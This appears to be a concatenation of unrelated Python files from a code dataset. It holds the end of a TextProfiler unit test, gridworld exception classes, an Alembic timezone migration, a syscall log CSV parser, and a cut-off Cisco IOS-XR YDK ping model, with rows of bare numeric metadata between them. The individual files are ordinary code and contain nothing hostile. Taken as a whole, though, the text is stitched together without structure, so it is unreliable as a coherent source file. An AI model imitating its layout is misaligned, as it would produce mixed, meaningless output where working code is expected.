        self.assertDictEqual(expected_vocab_count, profile["vocab_count"])

        # change number of common chars
        options.top_k_chars = 2
        text_profile = TextProfiler("Name", options=options)
        text_profile.update(sample)
        profile = text_profile.profile
        expected_vocab_count = {'s': 10, 't': 9}
        self.assertDictEqual(expected_vocab_count, profile["vocab_count"])

        # change number of common chars greater than length of vocab_counts list
        options.top_k_chars = 300
        text_profile = TextProfiler("Name", options=options)
        text_profile.update(sample)
        profile = text_profile.profile
        expected_vocab_count = {'s': 10, 't': 9, ' ': 8, 'i': 7, 'e': 5,
                                'h': 4, 'n': 2, ',': 1, 'a': 1, 'c': 1}
        self.assertDictEqual(expected_vocab_count, profile["vocab_count"])

    def test_options_most_common_words_count(self):
        """top_k_words (None / small / larger than word set) bounds word_count."""
        # None value for number of common words
        options = TextProfilerOptions()
        options.top_k_words = None
        options.stop_words = []  # set stop_words to empty list for easy inspection
        text_profile = TextProfiler("Name", options=options)
        sample = pd.Series(["this is test,", " this is a test sentence",
                            "this is", "this"])
        text_profile.update(sample)
        profile = text_profile.profile
        expected_word_count = {'this': 4, 'is': 3, 'test': 2, 'a': 1,
                               'sentence': 1}
        self.assertDictEqual(expected_word_count, profile["word_count"])

        # set number of common words to 3
        options.top_k_words = 3
        options.stop_words = []  # set stop_words to empty list for easy inspection
        text_profile = TextProfiler("Name", options=options)
        sample = pd.Series(["this is test,", " this is a test sentence",
                            "this is", "this"])
        text_profile.update(sample)
        profile = text_profile.profile
        expected_word_count = {'this': 4, 'is': 3, 'test': 2}
        self.assertDictEqual(expected_word_count, profile["word_count"])

        # change number of common words
        options.top_k_words = 2
        text_profile = TextProfiler("Name", options=options)
        text_profile.update(sample)
        profile = text_profile.profile
        expected_word_count = {'this': 4, 'is': 3}
        self.assertDictEqual(expected_word_count, profile["word_count"])

        # change number of common words greater than length of word_counts list
        options.top_k_words = 10
        text_profile = TextProfiler("Name", options=options)
        text_profile.update(sample)
        profile = text_profile.profile
        expected_word_count = {'this': 4, 'is': 3, 'test': 2, 'a': 1,
                               'sentence': 1}
        self.assertDictEqual(expected_word_count, profile["word_count"])
| 44.542593
| 88
| 0.585665
| 2,877
| 24,053
| 4.709767
| 0.055961
| 0.079557
| 0.067749
| 0.047528
| 0.914686
| 0.888708
| 0.874686
| 0.862657
| 0.84679
| 0.828856
| 0
| 0.023226
| 0.280422
| 24,053
| 539
| 89
| 44.625232
| 0.759649
| 0.108386
| 0
| 0.82337
| 0
| 0
| 0.131838
| 0
| 0
| 0
| 0
| 0
| 0.184783
| 1
| 0.046196
| false
| 0
| 0.01087
| 0
| 0.059783
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5b0a7b31e9d628829949c386ed303a873f88160b
| 158
|
py
|
Python
|
gridworlds/grid_exceptions.py
|
ryanmccauley211/gridworld
|
bca2e4894c10b9b8e2462e97b754b39248fe4f06
|
[
"MIT"
] | null | null | null |
gridworlds/grid_exceptions.py
|
ryanmccauley211/gridworld
|
bca2e4894c10b9b8e2462e97b754b39248fe4f06
|
[
"MIT"
] | null | null | null |
gridworlds/grid_exceptions.py
|
ryanmccauley211/gridworld
|
bca2e4894c10b9b8e2462e97b754b39248fe4f06
|
[
"MIT"
] | null | null | null |
class GridOutOfBoundsException(Exception):
    """Exception for grid out-of-bounds conditions.

    Idiomatic form: a docstring replaces the bare ``pass`` body, so the
    class both documents itself and needs no placeholder statement.
    """
class GridGenerateException(Exception):
    """Exception for failures while generating a grid.

    Idiomatic form: a docstring replaces the bare ``pass`` body, so the
    class both documents itself and needs no placeholder statement.
    """
class InvalidDimensionsException(Exception):
    """Exception for invalid grid dimensions.

    Idiomatic form: a docstring replaces the bare ``pass`` body, so the
    class both documents itself and needs no placeholder statement.
    """
| 15.8
| 44
| 0.791139
| 12
| 158
| 10.416667
| 0.5
| 0.312
| 0.288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151899
| 158
| 10
| 45
| 15.8
| 0.932836
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
d2bfc8513e0ee171ec34c9dff101d8bdf4052b71
| 21,962
|
py
|
Python
|
server/kraken/migrations/versions/42ea01a6cf31_convert_timestamps_to_with_timezones.py
|
fossabot/kraken-3
|
7ac472de8ff6f44aac4dbd231f896f00e6f3b278
|
[
"Apache-2.0"
] | 66
|
2020-08-14T12:52:39.000Z
|
2022-03-31T13:56:25.000Z
|
server/kraken/migrations/versions/42ea01a6cf31_convert_timestamps_to_with_timezones.py
|
kinsanras/kraken
|
3938ee4e65ba8f67ec5ee0e912b43fad84548f2c
|
[
"Apache-2.0"
] | 110
|
2020-07-23T07:12:09.000Z
|
2022-03-26T05:54:18.000Z
|
server/kraken/migrations/versions/42ea01a6cf31_convert_timestamps_to_with_timezones.py
|
kinsanras/kraken
|
3938ee4e65ba8f67ec5ee0e912b43fad84548f2c
|
[
"Apache-2.0"
] | 4
|
2021-03-10T05:25:03.000Z
|
2022-01-24T10:12:33.000Z
|
"""convert timestamps to with timezones
Revision ID: 42ea01a6cf31
Revises: ce05198f524a
Create Date: 2021-06-26 23:50:50.271191
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '42ea01a6cf31'        # this migration's unique ID
down_revision = 'ce05198f524a'   # parent migration in the chain
branch_labels = None             # no named branches for this revision
depends_on = None                # no cross-branch dependencies
def upgrade():
    """Widen every timestamp column to TIMESTAMP WITH TIME ZONE.

    Each (table, column, existing_nullable) triple below reproduces one
    `op.alter_column` call from the Alembic autogenerate output, applied
    in the original order.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    tz_columns = [
        ('agents', 'created', False),
        ('agents', 'deleted', True),
        ('agents', 'last_seen', True),
        ('agents', 'updated', False),
        ('agents_groups', 'created', False),
        ('agents_groups', 'deleted', True),
        ('agents_groups', 'updated', False),
        ('branches', 'created', False),
        ('branches', 'deleted', True),
        ('branches', 'updated', False),
        ('flows', 'created', False),
        ('flows', 'deleted', True),
        ('flows', 'finished', True),
        ('flows', 'updated', False),
        ('jobs', 'assigned', True),
        ('jobs', 'completed', True),
        ('jobs', 'created', False),
        ('jobs', 'deleted', True),
        ('jobs', 'finished', True),
        ('jobs', 'processing_started', True),
        ('jobs', 'started', True),
        ('jobs', 'updated', False),
        ('projects', 'created', False),
        ('projects', 'deleted', True),
        ('projects', 'updated', False),
        ('repo_changes', 'created', False),
        ('repo_changes', 'deleted', True),
        ('repo_changes', 'updated', False),
        ('runs', 'created', False),
        ('runs', 'deleted', True),
        ('runs', 'email_sent', True),
        ('runs', 'finished', True),
        ('runs', 'finished_again', True),
        ('runs', 'hard_timeout_reached', True),
        ('runs', 'soft_timeout_reached', True),
        ('runs', 'started', True),
        ('runs', 'updated', False),
        ('secrets', 'created', False),
        ('secrets', 'deleted', True),
        ('secrets', 'updated', False),
        ('stages', 'created', False),
        ('stages', 'deleted', True),
        ('stages', 'updated', False),
        ('steps', 'created', False),
        ('steps', 'deleted', True),
        ('steps', 'updated', False),
        ('test_cases', 'created', False),
        ('test_cases', 'deleted', True),
        ('test_cases', 'updated', False),
        ('tools', 'created', False),
        ('tools', 'deleted', True),
        ('tools', 'updated', False),
        ('user_sessions', 'created', False),
        ('user_sessions', 'deleted', True),
        ('user_sessions', 'updated', False),
        ('users', 'created', False),
        ('users', 'deleted', True),
        ('users', 'updated', False),
    ]
    for table, column, nullable in tz_columns:
        op.alter_column(table, column,
                        existing_type=postgresql.TIMESTAMP(),
                        type_=sa.DateTime(timezone=True),
                        existing_nullable=nullable)
    # ### end Alembic commands ###
def downgrade():
    """Narrow every timestamp column back to naive TIMESTAMP.

    Each (table, column, existing_nullable) triple below is listed in
    the upgrade order; iterating it reversed reproduces the original
    autogenerated downgrade call sequence exactly.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    tz_columns = [
        ('agents', 'created', False),
        ('agents', 'deleted', True),
        ('agents', 'last_seen', True),
        ('agents', 'updated', False),
        ('agents_groups', 'created', False),
        ('agents_groups', 'deleted', True),
        ('agents_groups', 'updated', False),
        ('branches', 'created', False),
        ('branches', 'deleted', True),
        ('branches', 'updated', False),
        ('flows', 'created', False),
        ('flows', 'deleted', True),
        ('flows', 'finished', True),
        ('flows', 'updated', False),
        ('jobs', 'assigned', True),
        ('jobs', 'completed', True),
        ('jobs', 'created', False),
        ('jobs', 'deleted', True),
        ('jobs', 'finished', True),
        ('jobs', 'processing_started', True),
        ('jobs', 'started', True),
        ('jobs', 'updated', False),
        ('projects', 'created', False),
        ('projects', 'deleted', True),
        ('projects', 'updated', False),
        ('repo_changes', 'created', False),
        ('repo_changes', 'deleted', True),
        ('repo_changes', 'updated', False),
        ('runs', 'created', False),
        ('runs', 'deleted', True),
        ('runs', 'email_sent', True),
        ('runs', 'finished', True),
        ('runs', 'finished_again', True),
        ('runs', 'hard_timeout_reached', True),
        ('runs', 'soft_timeout_reached', True),
        ('runs', 'started', True),
        ('runs', 'updated', False),
        ('secrets', 'created', False),
        ('secrets', 'deleted', True),
        ('secrets', 'updated', False),
        ('stages', 'created', False),
        ('stages', 'deleted', True),
        ('stages', 'updated', False),
        ('steps', 'created', False),
        ('steps', 'deleted', True),
        ('steps', 'updated', False),
        ('test_cases', 'created', False),
        ('test_cases', 'deleted', True),
        ('test_cases', 'updated', False),
        ('tools', 'created', False),
        ('tools', 'deleted', True),
        ('tools', 'updated', False),
        ('user_sessions', 'created', False),
        ('user_sessions', 'deleted', True),
        ('user_sessions', 'updated', False),
        ('users', 'created', False),
        ('users', 'deleted', True),
        ('users', 'updated', False),
    ]
    for table, column, nullable in reversed(tz_columns):
        op.alter_column(table, column,
                        existing_type=sa.DateTime(timezone=True),
                        type_=postgresql.TIMESTAMP(),
                        existing_nullable=nullable)
    # ### end Alembic commands ###
| 44.729124
| 65
| 0.596121
| 2,084
| 21,962
| 6.038868
| 0.043186
| 0.064521
| 0.119825
| 0.202781
| 0.975606
| 0.975606
| 0.972745
| 0.96178
| 0.95447
| 0.95447
| 0
| 0.003207
| 0.290046
| 21,962
| 490
| 66
| 44.820408
| 0.803938
| 0.01448
| 0
| 0.980973
| 0
| 0
| 0.079696
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004228
| false
| 0
| 0.006342
| 0
| 0.010571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d2e159519bcfba6a22741e083054d4da7cb36577
| 3,450
|
py
|
Python
|
parsers/milliscope_parser.py
|
jazevedo620/wise-kubernetes
|
a39daa1bb4b742c974a43f3d5e44f6036d1d16ad
|
[
"Apache-2.0"
] | 1
|
2020-03-13T06:10:18.000Z
|
2020-03-13T06:10:18.000Z
|
parsers/milliscope_parser.py
|
elba-kubernetes/experiment
|
a39daa1bb4b742c974a43f3d5e44f6036d1d16ad
|
[
"Apache-2.0"
] | 1
|
2020-09-18T20:14:38.000Z
|
2020-09-18T20:14:38.000Z
|
parsers/milliscope_parser.py
|
elba-kubernetes/experiment
|
a39daa1bb4b742c974a43f3d5e44f6036d1d16ad
|
[
"Apache-2.0"
] | null | null | null |
import csv
import numpy
import sys
from collections import OrderedDict
class LogEntryConnect:
    """A TCP/IP event log entry for a 'connect' syscall, including the port."""

    def __init__(self, event, ret, ts, pid, tid, sock_fd, port):
        """Store the raw fields of one logged syscall.

        event -- [str] Name of the invoked syscall: 'connect', 'sendto', or 'recvfrom'.
        ret -- [int] Syscall return value.
        ts -- [int] Timestamp generated when the syscall was invoked.
        pid -- [int] Process id.
        tid -- [int] Thread id.
        sock_fd -- [int] File descriptor of the socket used by the syscall.
        port -- [int] Port associated with the connection.
        """
        (self._event, self._ret, self._ts, self._pid,
         self._tid, self._sock_fd, self._port) = (
            event, ret, ts, pid, tid, sock_fd, port)

    def __lt__(self, other):
        """Order entries chronologically by their timestamps.

        other -- [LogEntryConnect] Another entry being compared against this.
        """
        return self._ts < other._ts

    def event(self):
        """Return the syscall name."""
        return self._event

    def ret(self):
        """Return the syscall return value."""
        return self._ret

    def ts(self):
        """Return the timestamp."""
        return self._ts

    def pid(self):
        """Return the process id."""
        return self._pid

    def tid(self):
        """Return the thread id."""
        return self._tid

    def sock_fd(self):
        """Return the socket file descriptor."""
        return self._sock_fd

    def port(self):
        """Return the port."""
        return self._port
class LogEntry:
    """A TCP/IP event log entry."""

    def __init__(self, event, ret, ts, pid, tid, sock_fd):
        """Store the raw fields of one logged syscall.

        event -- [str] Name of the invoked syscall: 'connect', 'sendto', or 'recvfrom'.
        ret -- [int] Syscall return value.
        ts -- [int] Timestamp generated when the syscall was invoked.
        pid -- [int] Process id.
        tid -- [int] Thread id.
        sock_fd -- [int] File descriptor of the socket used by the syscall.
        """
        (self._event, self._ret, self._ts,
         self._pid, self._tid, self._sock_fd) = (
            event, ret, ts, pid, tid, sock_fd)

    def __lt__(self, other):
        """Order entries chronologically by their timestamps.

        other -- [LogEntry] Another LogEntry being compared against this.
        """
        return self._ts < other._ts

    def event(self):
        """Return the syscall name."""
        return self._event

    def ret(self):
        """Return the syscall return value."""
        return self._ret

    def ts(self):
        """Return the timestamp."""
        return self._ts

    def pid(self):
        """Return the process id."""
        return self._pid

    def tid(self):
        """Return the thread id."""
        return self._tid

    def sock_fd(self):
        """Return the socket file descriptor."""
        return self._sock_fd
def spec_connect(iterator):
    """Parse connect-event CSV rows into an ordered map of LogEntryConnect.

    iterator -- iterable of CSV lines whose header row names the columns
                RET, TS, PID, TID, SOCK_FD and PORT.
    Returns an OrderedDict mapping the 0-based row index to a
    LogEntryConnect built from that row.
    """
    entries = OrderedDict()
    for index, row in enumerate(csv.DictReader(iterator)):
        entries[index] = LogEntryConnect(
            'connect',
            int(row['RET']),
            int(row['TS']),
            int(row['PID']),
            int(row['TID']),
            int(row['SOCK_FD']),
            int(row['PORT']))
    return entries
def main(iterator):
    """Parse event CSV rows into an ordered map of LogEntry.

    iterator -- iterable of CSV lines whose header row names the columns
                RET, TS, PID, TID and SOCK_FD.
    Returns an OrderedDict mapping the 0-based row index to a LogEntry
    built from that row.
    """
    entries = OrderedDict()
    for index, row in enumerate(csv.DictReader(iterator)):
        entries[index] = LogEntry(
            'connect',
            int(row['RET']),
            int(row['TS']),
            int(row['PID']),
            int(row['TID']),
            int(row['SOCK_FD']))
    return entries
| 27.6
| 207
| 0.597101
| 442
| 3,450
| 4.445701
| 0.169683
| 0.054962
| 0.072774
| 0.018321
| 0.844784
| 0.844784
| 0.821374
| 0.821374
| 0.821374
| 0.821374
| 0
| 0.001613
| 0.281159
| 3,450
| 125
| 208
| 27.6
| 0.790726
| 0.307826
| 0
| 0.776119
| 0
| 0
| 0.02427
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.283582
| false
| 0
| 0.059701
| 0.104478
| 0.626866
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
9621d312f0f0599663a55ebe605be8beb25bf079
| 48,261
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ping_act.py
|
bopopescu/ACI
|
dd717bc74739eeed4747b3ea9e36b239580df5e1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ping_act.py
|
bopopescu/ACI
|
dd717bc74739eeed4747b3ea9e36b239580df5e1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ping_act.py
|
bopopescu/ACI
|
dd717bc74739eeed4747b3ea9e36b239580df5e1
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2020-07-22T04:04:44.000Z
|
2020-07-22T04:04:44.000Z
|
""" Cisco_IOS_XR_ping_act
This module contains a collection of YANG definitions
for Cisco IOS\-XR ping action package configuration.
Copyright (c) 2016 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Ping(Entity):
"""
Send echo messages
.. attribute:: input
**type**\: :py:class:`Input <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Input>`
.. attribute:: output
**type**\: :py:class:`Output <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output>`
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
    def __init__(self):
        # Initialize the top-level "ping" RPC entity and attach its
        # auto-generated input/output child containers.
        super(Ping, self).__init__()
        self._top_entity = None
        self.yang_name = "ping"
        self.yang_parent_name = "Cisco-IOS-XR-ping-act"
        self.is_top_level_class = True
        self.has_list_ancestor = False
        self.ylist_key_names = []
        # No containers, lists or leafs are registered directly on the
        # RPC node itself; input/output are wired up below instead.
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict()
        self.input = Ping.Input()
        self.input.parent = self
        self._children_name_map["input"] = "input"
        self._children_yang_names.add("input")
        self.output = Ping.Output()
        self.output.parent = self
        self._children_name_map["output"] = "output"
        self._children_yang_names.add("output")
        self._segment_path = lambda: "Cisco-IOS-XR-ping-act:ping"
class Input(Entity):
"""
.. attribute:: destination
**type**\: :py:class:`Destination <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Input.Destination>`
.. attribute:: ipv4
**type**\: list of :py:class:`Ipv4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Input.Ipv4>`
.. attribute:: ipv6
**type**\: :py:class:`Ipv6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Input.Ipv6>`
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
        def __init__(self):
            # Initialize the RPC "input" container: one 'destination'
            # container, one 'ipv6' container, and a YList of 'ipv4' entries.
            super(Ping.Input, self).__init__()
            self.yang_name = "input"
            self.yang_parent_name = "ping"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            self._child_container_classes = OrderedDict([("destination", ("destination", Ping.Input.Destination)), ("ipv6", ("ipv6", Ping.Input.Ipv6))])
            self._child_list_classes = OrderedDict([("ipv4", ("ipv4", Ping.Input.Ipv4))])
            self._leafs = OrderedDict()
            self.destination = Ping.Input.Destination()
            self.destination.parent = self
            self._children_name_map["destination"] = "destination"
            self._children_yang_names.add("destination")
            self.ipv6 = Ping.Input.Ipv6()
            self.ipv6.parent = self
            self._children_name_map["ipv6"] = "ipv6"
            self._children_yang_names.add("ipv6")
            self.ipv4 = YList(self)
            self._segment_path = lambda: "input"
            self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/%s" % self._segment_path()
        def __setattr__(self, name, value):
            # Route all attribute writes through ydk's validation hook;
            # this container has no plain leafs, hence the empty list.
            self._perform_setattr(Ping.Input, [], name, value)
class Destination(Entity):
"""
.. attribute:: destination
Ping destination address or hostname
**type**\: str
**mandatory**\: True
.. attribute:: repeat_count
Number of ping packets to be sent out
**type**\: int
**range:** 1..64
**default value**\: 5
.. attribute:: data_size
Size of ping packet
**type**\: int
**range:** 36..18024
**default value**\: 100
.. attribute:: timeout
Timeout in seconds
**type**\: int
**range:** 0..36
**default value**\: 2
.. attribute:: interval
Ping interval in milli seconds
**type**\: int
**range:** 0..3600
**default value**\: 10
.. attribute:: pattern
Pattern of payload data
**type**\: str
**pattern:** [0\-9a\-fA\-F]{1,8}
.. attribute:: sweep
Sweep is enabled
**type**\: bool
.. attribute:: vrf_name
VRF name
**type**\: str
.. attribute:: source
Source address or interface
**type**\: str
.. attribute:: verbose
Validate return packet
**type**\: bool
.. attribute:: type_of_service
Type of Service
**type**\: int
**range:** 0..255
.. attribute:: do_not_frag
Do Not Fragment
**type**\: bool
.. attribute:: validate
Validate return packet
**type**\: bool
.. attribute:: priority
Priority of the packet
**type**\: int
**range:** 0..15
.. attribute:: outgoing_interface
Outgoing interface, needed in case of ping to link local address
**type**\: str
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
            def __init__(self):
                # Initialize the 'destination' container and register its
                # leaf nodes (YANG leaf name on the right, Python attribute
                # name on the left).
                super(Ping.Input.Destination, self).__init__()
                self.yang_name = "destination"
                self.yang_parent_name = "input"
                self.is_top_level_class = False
                self.has_list_ancestor = False
                self.ylist_key_names = []
                self._child_container_classes = OrderedDict([])
                self._child_list_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('destination', YLeaf(YType.str, 'destination')),
                    ('repeat_count', YLeaf(YType.uint64, 'repeat-count')),
                    ('data_size', YLeaf(YType.uint64, 'data-size')),
                    ('timeout', YLeaf(YType.uint64, 'timeout')),
                    ('interval', YLeaf(YType.uint32, 'interval')),
                    ('pattern', YLeaf(YType.str, 'pattern')),
                    ('sweep', YLeaf(YType.boolean, 'sweep')),
                    ('vrf_name', YLeaf(YType.str, 'vrf-name')),
                    ('source', YLeaf(YType.str, 'source')),
                    ('verbose', YLeaf(YType.boolean, 'verbose')),
                    ('type_of_service', YLeaf(YType.uint8, 'type-of-service')),
                    ('do_not_frag', YLeaf(YType.boolean, 'do-not-frag')),
                    ('validate', YLeaf(YType.boolean, 'validate')),
                    ('priority', YLeaf(YType.uint8, 'priority')),
                    ('outgoing_interface', YLeaf(YType.str, 'outgoing-interface')),
                ])
                # Leaf values start unset; ydk populates them on assignment.
                self.destination = None
                self.repeat_count = None
                self.data_size = None
                self.timeout = None
                self.interval = None
                self.pattern = None
                self.sweep = None
                self.vrf_name = None
                self.source = None
                self.verbose = None
                self.type_of_service = None
                self.do_not_frag = None
                self.validate = None
                self.priority = None
                self.outgoing_interface = None
                self._segment_path = lambda: "destination"
                self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/input/%s" % self._segment_path()
            def __setattr__(self, name, value):
                # Route attribute writes through ydk's validation hook for
                # the leaf names registered in __init__.
                self._perform_setattr(Ping.Input.Destination, ['destination', 'repeat_count', 'data_size', 'timeout', 'interval', 'pattern', 'sweep', 'vrf_name', 'source', 'verbose', 'type_of_service', 'do_not_frag', 'validate', 'priority', 'outgoing_interface'], name, value)
class Ipv4(Entity):
"""
.. attribute:: destination (key)
Ping destination address or hostname
**type**\: str
**mandatory**\: True
.. attribute:: repeat_count
Number of ping packets to be sent out
**type**\: int
**range:** 1..64
**default value**\: 5
.. attribute:: data_size
Size of ping packet
**type**\: int
**range:** 36..18024
**default value**\: 100
.. attribute:: timeout
Timeout in seconds
**type**\: int
**range:** 0..36
**default value**\: 2
.. attribute:: interval
Ping interval in milli seconds
**type**\: int
**range:** 0..3600
**default value**\: 10
.. attribute:: pattern
Pattern of payload data
**type**\: str
**pattern:** [0\-9a\-fA\-F]{1,8}
.. attribute:: sweep
Sweep is enabled
**type**\: bool
.. attribute:: vrf_name
VRF name
**type**\: str
.. attribute:: source
Source address or interface
**type**\: str
.. attribute:: verbose
Validate return packet
**type**\: bool
.. attribute:: type_of_service
Type of Service
**type**\: int
**range:** 0..255
.. attribute:: do_not_frag
Do Not Fragment
**type**\: bool
.. attribute:: validate
Validate return packet
**type**\: bool
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
            def __init__(self):
                # Initialize one 'ipv4' list entry; 'destination' is the
                # list key, so it is embedded in the segment path below.
                super(Ping.Input.Ipv4, self).__init__()
                self.yang_name = "ipv4"
                self.yang_parent_name = "input"
                self.is_top_level_class = False
                self.has_list_ancestor = False
                self.ylist_key_names = ['destination']
                self._child_container_classes = OrderedDict([])
                self._child_list_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('destination', YLeaf(YType.str, 'destination')),
                    ('repeat_count', YLeaf(YType.uint64, 'repeat-count')),
                    ('data_size', YLeaf(YType.uint64, 'data-size')),
                    ('timeout', YLeaf(YType.uint64, 'timeout')),
                    ('interval', YLeaf(YType.uint32, 'interval')),
                    ('pattern', YLeaf(YType.str, 'pattern')),
                    ('sweep', YLeaf(YType.boolean, 'sweep')),
                    ('vrf_name', YLeaf(YType.str, 'vrf-name')),
                    ('source', YLeaf(YType.str, 'source')),
                    ('verbose', YLeaf(YType.boolean, 'verbose')),
                    ('type_of_service', YLeaf(YType.uint8, 'type-of-service')),
                    ('do_not_frag', YLeaf(YType.boolean, 'do-not-frag')),
                    ('validate', YLeaf(YType.boolean, 'validate')),
                ])
                # Leaf values start unset; ydk populates them on assignment.
                self.destination = None
                self.repeat_count = None
                self.data_size = None
                self.timeout = None
                self.interval = None
                self.pattern = None
                self.sweep = None
                self.vrf_name = None
                self.source = None
                self.verbose = None
                self.type_of_service = None
                self.do_not_frag = None
                self.validate = None
                self._segment_path = lambda: "ipv4" + "[destination='" + str(self.destination) + "']"
                self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/input/%s" % self._segment_path()
            def __setattr__(self, name, value):
                # Route attribute writes through ydk's validation hook for
                # the leaf names registered in __init__.
                self._perform_setattr(Ping.Input.Ipv4, ['destination', 'repeat_count', 'data_size', 'timeout', 'interval', 'pattern', 'sweep', 'vrf_name', 'source', 'verbose', 'type_of_service', 'do_not_frag', 'validate'], name, value)
class Ipv6(Entity):
"""
.. attribute:: destination
Ping destination address or hostname
**type**\: str
**mandatory**\: True
.. attribute:: repeat_count
Number of ping packets to be sent out
**type**\: int
**range:** 1..64
**default value**\: 5
.. attribute:: data_size
Size of ping packet
**type**\: int
**range:** 36..18024
**default value**\: 100
.. attribute:: timeout
Timeout in seconds
**type**\: int
**range:** 0..36
**default value**\: 2
.. attribute:: interval
Ping interval in milli seconds
**type**\: int
**range:** 0..3600
**default value**\: 10
.. attribute:: pattern
Pattern of payload data
**type**\: str
**pattern:** [0\-9a\-fA\-F]{1,8}
.. attribute:: sweep
Sweep is enabled
**type**\: bool
.. attribute:: vrf_name
VRF name
**type**\: str
.. attribute:: source
Source address or interface
**type**\: str
.. attribute:: verbose
Validate return packet
**type**\: bool
.. attribute:: priority
Priority of the packet
**type**\: int
**range:** 0..15
.. attribute:: outgoing_interface
Outgoing interface, needed in case of ping to link local address
**type**\: str
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
            def __init__(self):
                # Initialize the 'ipv6' container and register its leaf
                # nodes (YANG leaf name on the right, attribute on the left).
                super(Ping.Input.Ipv6, self).__init__()
                self.yang_name = "ipv6"
                self.yang_parent_name = "input"
                self.is_top_level_class = False
                self.has_list_ancestor = False
                self.ylist_key_names = []
                self._child_container_classes = OrderedDict([])
                self._child_list_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('destination', YLeaf(YType.str, 'destination')),
                    ('repeat_count', YLeaf(YType.uint64, 'repeat-count')),
                    ('data_size', YLeaf(YType.uint64, 'data-size')),
                    ('timeout', YLeaf(YType.uint64, 'timeout')),
                    ('interval', YLeaf(YType.uint32, 'interval')),
                    ('pattern', YLeaf(YType.str, 'pattern')),
                    ('sweep', YLeaf(YType.boolean, 'sweep')),
                    ('vrf_name', YLeaf(YType.str, 'vrf-name')),
                    ('source', YLeaf(YType.str, 'source')),
                    ('verbose', YLeaf(YType.boolean, 'verbose')),
                    ('priority', YLeaf(YType.uint8, 'priority')),
                    ('outgoing_interface', YLeaf(YType.str, 'outgoing-interface')),
                ])
                # Leaf values start unset; ydk populates them on assignment.
                self.destination = None
                self.repeat_count = None
                self.data_size = None
                self.timeout = None
                self.interval = None
                self.pattern = None
                self.sweep = None
                self.vrf_name = None
                self.source = None
                self.verbose = None
                self.priority = None
                self.outgoing_interface = None
                self._segment_path = lambda: "ipv6"
                self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/input/%s" % self._segment_path()
def __setattr__(self, name, value):
    # Route attribute writes through YDK validation for the declared leaf names.
    self._perform_setattr(Ping.Input.Ipv6, ['destination', 'repeat_count', 'data_size', 'timeout', 'interval', 'pattern', 'sweep', 'vrf_name', 'source', 'verbose', 'priority', 'outgoing_interface'], name, value)
class Output(Entity):
    """
    .. attribute:: ping_response

        **type**\: :py:class:`PingResponse <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse>`
    """

    _prefix = 'ping-act'
    _revision = '2016-09-28'

    def __init__(self):
        # Output container of the ping RPC; owns exactly one ping-response child.
        super(Ping.Output, self).__init__()

        self.yang_name = "output"
        self.yang_parent_name = "ping"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
